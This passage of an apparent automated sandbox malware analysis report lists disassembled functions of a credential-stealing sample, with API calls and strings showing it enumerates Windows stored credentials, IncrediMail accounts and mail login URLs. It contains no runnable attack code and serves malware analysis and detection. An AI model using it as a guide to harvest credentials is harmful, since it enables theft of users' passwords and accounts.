                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                  • String ID: Creds$ps:password
                                                                                                                                                                                  • API String ID: 551151806-1872227768
                                                                                                                                                                                  • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                                                                  • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                                                                  • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                                                                  Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                  • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                  • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                  • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                  • API String ID: 3866421160-4070641962
                                                                                                                                                                                  • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                                                  • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                                                  • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                                                  Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                                                                                                  • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                                                                                                    • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                    • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                    • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                  • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                                                                                  • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                                                                                  • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                                                                                                  • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                  • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                    • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                  • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                  • API String ID: 1035899707-3647959541
                                                                                                                                                                                  • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                                                  • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                                                  • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                                                  • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                                                  Function 00410D3D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy
                                                                                                                                                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                  • API String ID: 714388716-318151290
                                                                                                                                                                                  • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                  • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                                                                                                                  • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                                                                                                                  Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                  • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                  • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                    • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                    • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                    • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                  • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                  • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                  • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                  • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1416211542-0
                                                                                                                                                                                  • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                  • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                                                                                  • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                  • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                                                                                  Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                  • API String ID: 2360744853-2229823034
                                                                                                                                                                                  • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                                                  • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                                                  • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                                                  • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                                  Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                  • memset.MSVCRT ref: 00410129
                                                                                                                                                                                    • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                    • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                  • memset.MSVCRT ref: 00410171
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                  • String ID: \systemroot
                                                                                                                                                                                  • API String ID: 912701516-1821301763
                                                                                                                                                                                  • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                                                  • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                                                  • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                                                  Function 00402FDB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • memset.MSVCRT ref: 0040301E
                                                                                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  • memset.MSVCRT ref: 0040306B
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00403083
                                                                                                                                                                                  • memset.MSVCRT ref: 004030B4
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004030FC
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00403125
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                                  • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                                  • API String ID: 3672803090-3168940695
                                                                                                                                                                                  • Opcode ID: c9eb44310dfb29f03ef0e10aa8539b91ddc0c6df349914104ac0254ae78c74f6
                                                                                                                                                                                  • Instruction ID: c63447841566cf46c771af6046a8c2292ff1b2fb78a85e5f221a3b25c3a6e5c2
                                                                                                                                                                                  • Opcode Fuzzy Hash: c9eb44310dfb29f03ef0e10aa8539b91ddc0c6df349914104ac0254ae78c74f6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C3140B280121CBEDB11EF91CC81EDEBB7CEF14345F0440A6B908A1052E7799F959FA4
                                                                                                                                                                                  Function 00408F1B Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                                  • API String ID: 3540791495-3849865405
                                                                                                                                                                                  • Opcode ID: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                                                                  • Instruction ID: 99806e288156f34ba132e8f36af0febe6860c11fee4b77973fd999a480d51a7c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7631B172408385AFD720DF51D841A9BBBE9FB84314F04483FF69492292D779D944CF5A
                                                                                                                                                                                  Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                  • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                  • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                  • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                  • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                  • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                  • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                  • API String ID: 1640410171-2022683286
                                                                                                                                                                                  • Opcode ID: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                                                                  • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                                  • Opcode Fuzzy Hash: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                                                                  • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                                  Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                  • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                  • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$strlen
                                                                                                                                                                                  • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                  • API String ID: 2619041689-3408036318
                                                                                                                                                                                  • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                  • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                                                  Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$strlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 667451143-3916222277
                                                                                                                                                                                  • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                                                                  • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                                  Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                  • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                  • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                  • String ID: J$Microsoft_WinInet
                                                                                                                                                                                  • API String ID: 3318079752-260894208
                                                                                                                                                                                  • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                                                  • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                                                  Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                  • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                  • API String ID: 2780580303-317687271
                                                                                                                                                                                  • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                  • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                  • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                                                                                                  Function 00406C7C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406CCC
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                  • API String ID: 2881943006-572158859
                                                                                                                                                                                  • Opcode ID: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                                                                  • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
